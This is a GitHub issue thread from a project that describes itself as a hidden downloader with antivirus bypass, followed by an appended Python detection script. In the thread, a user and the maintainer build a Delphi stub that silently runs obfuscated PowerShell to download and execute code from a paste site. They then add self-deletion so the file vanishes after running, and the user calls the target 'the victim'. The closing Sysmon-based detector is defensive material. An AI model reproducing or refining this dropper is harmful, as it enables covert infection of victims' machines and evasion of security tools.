UnamSanctam / UnamDownloader

A Free Silent (Hidden) Open Source Downloader (Binder) - Includes Windows Defender Bypass - Build Native - Unam Downloader
MIT License
173 stars 56 forks

Self Destruct Feature #56

Open msfcon5ol3 opened 1 year ago

msfcon5ol3 commented 1 year ago

This code snippet below is Delphi based, I was gonna use C# but too many AV detections. Could you help me to add a self-destruct function to delete the file from the disk after execution? Thanks for your help.

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'IEX(New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘paste.ee/r/l2tlb/0’)', nil, SW_HIDE);
end.

UnamSanctam commented 1 year ago

In the powershell command add a delay and then a command to remove the file (itself).

msfcon5ol3 commented 1 year ago

In the powershell command add a delay and then a command to remove the file (itself).

This worked, but if there's a case in which the file is renamed by the victim, this makes this command useless. What could I do here instead of using the file name as the method of deletion?

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item payload.exe -Force', nil, SW_HIDE);
end.

UnamSanctam commented 1 year ago

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

msfcon5ol3 commented 1 year ago

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

Could you edit the code for me please? I'm a noob in Delphi.

UnamSanctam commented 1 year ago

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

msfcon5ol3 commented 1 year ago

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

Thanks but compilation error, I'm still trying to fix it....

UnamSanctam commented 1 year ago

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

msfcon5ol3 commented 1 year ago

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

Thanks, finally it worked like a charm, really appreciate your help. If you want you can add this as a new stub in UnamDownloader for the next release, but you may have to add some Delphi / Pascal compiler to your repository and the other options such as start delay, fake error, run as admin etc.

UnamSanctam commented 1 year ago

No problem and great that it worked. And I probably won't use it since I'm planning on other things but thank you.
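
For defenders, an added example (not code from this thread or from the UnamDownloader project): because the final stub passes its own path via `ParamStr(0)`, the hidden PowerShell child's command line names its parent's image whatever the file was renamed to, which process-creation telemetry can match. The Python sketch below assumes Sysmon Event ID 1 field names and runs over constructed sample records; it also undoes the backtick and string-concatenation obfuscation from the first snippet before matching.

```python
import re

PS = ("\\powershell.exe", "\\pwsh.exe")
QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})
DELETE = re.compile(r"\b(remove-item|del|erase|rm|ri)\b")
DOWNLOAD = ("downloadstring", "downloadfile", "downloaddata")
PSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample records (Sysmon Event ID 1 field names); the paths and
# the example.invalid URL are placeholders, not values taken from the thread.
EVENTS = [
    {"ParentImage": r"C:\Users\a\Downloads\invoice.exe", "Image": PSH,
     "CommandLine": r"powershell start calc.exe;Remove-Item "
                    r"'C:\Users\a\Downloads\invoice.exe' -Force"},
    {"ParentImage": r"C:\Users\a\Downloads\setup.exe", "Image": PSH,
     "CommandLine": "powershell IEX(New-Object Net.WebClient)."
                    "\u201c`D`o`wn`l`oa`d`Str`in`g\u201d"
                    "('htt' + 'ps://' + 'example.invalid/x')"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PSH,
     "CommandLine": r"powershell Remove-Item 'C:\Temp\old.log' -Force"},
]

def normalize(cmd):
    """Undo the cheap obfuscation seen in the thread before matching."""
    cmd = cmd.translate(QUOTES)                  # curly quotes -> straight
    cmd = cmd.replace("`", "")                   # drop backtick escapes
    cmd = re.sub(r"(['\"])\s*\+\s*\1", "", cmd)  # 'htt' + 'ps://' -> 'https://'
    return cmd.lower()

def classify(ev):
    """Return the findings for one process-creation record."""
    if not ev["Image"].lower().endswith(PS):
        return []
    raw, cmd = ev["CommandLine"].lower(), normalize(ev["CommandLine"])
    findings = []
    # The child is told to delete the image of the process that launched it.
    if DELETE.search(cmd) and ev["ParentImage"].lower() in cmd:
        findings.append("parent-self-delete")
    # A download method name only becomes visible after normalisation.
    if any(m in cmd and m not in raw for m in DOWNLOAD):
        findings.append("obfuscated-download")
    return findings

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["ParentImage"], "->", classify(ev) or "no finding")
```

The third record shows the negative case: an ordinary `Remove-Item` launched from Explorer does not reference its parent's image and produces no finding.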